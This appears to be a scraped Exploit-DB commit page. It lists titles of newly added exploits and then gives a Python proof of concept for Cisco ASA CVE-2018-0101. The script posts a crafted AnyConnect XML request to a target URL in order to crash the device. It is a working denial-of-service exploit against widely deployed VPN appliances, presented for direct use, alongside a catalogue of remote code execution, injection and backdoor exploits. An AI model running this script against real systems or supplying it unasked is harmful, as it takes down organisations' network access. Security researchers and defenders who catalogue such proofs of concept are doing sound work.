2c4b08963a
25 changes to exploits/shellcodes QNAP NAS Devices - Heap Overflow QNAP NVR/NAS - Buffer Overflow (PoC) QNAP NVR/NAS Devices - Buffer Overflow (PoC) Cisco ASA - Crash PoC Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption Android - 'getpidcon' Permission Bypass in KeyStore Service Multiple OEM - 'nsd' Remote Stack Format String (PoC) HP-UX 11.0 - pppd Stack Buffer Overflow HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow SGI IRIX - 'LsD' Multiple Buffer Overflows SGI IRIX - 'LsD' Multiple Local Buffer Overflows PostScript Utilities - 'psnup' Argument Buffer Overflow PostScript Utilities - 'psnup' Local Buffer Overflow Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access Geovision Inc. IP Camera & Video - Remote Command Execution Axis SSI - Remote Command Execution / Read Files Axis Communications MPQT/PACS - Heap Overflow / Information Leakage Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD Uniview - Remote Command Execution / Export Config (PoC) Vitek - Remote Command Execution / Information Disclosure (PoC) Vivotek IP Cameras - Remote Stack Overflow (PoC) Dahua Generation 2/3 - Backdoor Access HiSilicon DVR Devices - Remote Code Execution JiRos Banner Experience 1.0 - Unauthorised Create Admin JiRos Banner Experience 1.0 - Unauthorized Create Admin Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting Naukri Clone Script - Persistent Cross-Site Scripting Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting Online Test Script 2.0.7 - 'cid' SQL Injection Entrepreneur Dating Script 2.0.2 - Authentication Bypass
35 lines
No EOL
1 KiB
Python
Executable file
35 lines
No EOL
1 KiB
Python
Executable file
#
|
|
# Cisco ASA CVE-2018-0101 Crash PoC
|
|
#
|
|
# We basically just read:
|
|
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
|
|
#
|
|
# @zerosum0x0, @jennamagius, @aleph___naught
|
|
#
|
|
|
|
import requests, sys
|
|
|
|
headers = {}
|
|
headers['User-Agent'] = 'Open AnyConnect VPN Agent
|
|
v7.08-265-gae481214-dirty'
|
|
headers['Content-Type'] = 'application/x-www-form-urlencoded'
|
|
headers['X-Aggregate-Auth'] = '1'
|
|
headers['X-Transcend-Version'] = '1'
|
|
headers['Accept-Encoding'] = 'identity'
|
|
headers['Accept'] = '*/*'
|
|
headers['X-AnyConnect-Platform'] = 'linux-64'
|
|
headers['X-Support-HTTP-Auth'] = 'false'
|
|
headers['X-Pad'] = '0000000000000000000000000000000000000000'
|
|
|
|
xml = """<?xml version="1.0" encoding="UTF-8"?>
|
|
<config-auth client="a" type="a" aggregate-auth-version="a">
|
|
<host-scan-reply>A</host-scan-reply>
|
|
</config-auth>
|
|
"""
|
|
|
|
r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False,
|
|
allow_redirects=False)
|
|
|
|
print(r.status_code)
|
|
print(r.headers)
|
|
print(r.text) |